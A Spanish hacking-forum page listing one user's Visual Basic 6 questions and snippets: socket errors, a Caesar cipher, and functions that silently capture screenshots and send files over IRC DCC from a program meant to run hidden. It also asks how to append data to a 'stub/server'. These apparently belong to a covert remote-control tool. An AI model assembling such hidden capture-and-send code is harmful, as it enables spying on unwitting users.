elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: [1]
1  Programación / Programación Visual Basic / Problema CSocketMaster y multi-conexion en: 5 Noviembre 2013, 03:35 am
Saludos, bueno mi duda es la siguiente estoy realizando un programa y necesito usar al menos 2/3 Sockets con CSMaster, el problema es que el primer socket me va bien pero cuando trato de usar el segundo me sale error: "Address Already in use" y señala esta parte del code de los modulos CSMaster:

Código
  1. Err.Raise lngErrorCode, "CSocketMaster.BindInternal", GetErrorDescription(lngErrorCode)

Mi pregunta: Puedo usar 2/3 Socket con CSocketMaster o debo usar CSocketPlus obligatoria mente para usar mas de un socket. Y si puedo usar el CSMaster como puedo evitar este error?

Saludos
Espero sus respuestas
2  Programación / Programación Visual Basic / Problemas con funciones, no cumplen lo especifico... en: 19 Octubre 2013, 01:37 am
Saludos, bueno mi problema es el siguiente tengo dos funciones las cuales al llamarlas tal cual como están no ejecutan lo deseado, pero, al agregar un Msgbox a la secuencia la misma si ejecuta los mismos...
E llegado a pensar que es por la "velocidad" en la cual se procesa los comandos (o eso creo) que no le da tiempo de procesarlas, intente usar DoEvents y otra funcion pero obtuve el mismo resultado que al comienzo un error, solo pude solventarlo con un Msgbox.

Mi aplicacion tiene que estar en "modo hide" por ende no puedo permitir ningun Msgbox y si lo usara al usarlo y la persona no darle "aceptar" o cierre el Msgbox el programa no sigue, que puedo hacer en este caso?

Funciones:

Código:
Public Function DCCSendFile(ByVal fPath As String) As Boolean
Dim FileSize As Long
Dim DataSend As Long
Dim buffer As String
Dim Bsize As Long
    Bsize = 1024
    
Open fPath For Binary Access Read As #1
    FileSize = LOF(1)
    Do Until EOF(1)
    'DoEvents
        If FileSize - Loc(1) <= Bsize Then
            Bsize = FileSize - Loc(1)
        End If
        If Bsize = 0 Then
            Exit Do
        End If
        
        DataSend = DataSend + Bsize
        buffer = Space$(Bsize)
        Get #1, , buffer
        'DoEvents
        wsfile.SendData buffer
    Loop
    MsgBox ("LISTO") ' Al quitar este Msgbox la funcion no guarda bien la imagen.
    DoEvents
    IRC_SendMessage "...", "DataSend: " & DataSend & " FileSize: " & FileLen(fPath) & " FileLOF: " & LOF(1)
    DoEvents
Close #1
wsfile.Close
DCCSendFile = True
End Function

Código:
Public Function m_SavePicture(ByVal Path As String) As Boolean
    Clipboard.Clear
      
    Call keybd_event(44, 1, 0&, 0&)
      
    ' DoEvents ' No hace diferencia

    MsgBox ("...") ' Al quitar este la funcion no procesa la captura
    If Clipboard.GetFormat(vbCFBitmap) Then
        SavePicture Clipboard.GetData(vbCFBitmap), Path
        m_SavePicture = True
    Else
        m_SavePicture = False
    End If
End Function

Saludos, Gracias..
3  Programación / Programación Visual Basic / ¿Existe algún suplente para EOF? en: 12 Septiembre 2013, 17:27 pm
Buenas, bueno quería saber si alguien tiene conocimiento de algún método para agregarle datos a un Stub, Server,etc... pero que no sea con el viejo método de Open file que es muy conocido.

Si alguien puede darme algún enlace para informarme o una referencia por favor.

Gracias.
4  Programación / Programación Visual Basic / [+] mCesar - Cifrado Cesar en: 7 Septiembre 2013, 01:34 am
Buenas, aquí les dejo un pequeño code que realice cuando estaba comenzando a programar y estaba interesado en la parte de criptografia.
El code es basado en el "cifrado por desplazamiento", "desplazamiento de Cesar", etc... como su mismo nombre lo indica lo que hace es "desplazar" los caracteres X cantidad de veces a la izquierda o derecha.

El code es bastante viejo puede ser fácilmente corregido, simplificado y mejorado lo coloco para aquellos que se inicien en la parte de Criptografia orientada a VB6.

Código:
Public Function mCesar_Encrypt(ByVal d As String) As String ' Funcion de cifrado.
Dim c As Long
Dim k As String

If d <> "" Then
    For i = 1 To Len(d)
        c = Asc(Mid(d, i, 1)) + 1
        k = k & Chr$(c)
    Next i
    mCesar_Encrypt = k
End If
End Function

Public Function mCesar_Decrypt(ByVal d As String) As String ' Funcion de Descifrado
Dim c As Long
Dim k As String

If d <> "" Then
    For i = 1 To Len(d)
        c = Asc(Mid(d, i, 1)) - 1
        k = k & Chr$(c)
    Next i
End If
mCesar_Decrypt = k
End Function

Saludos.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines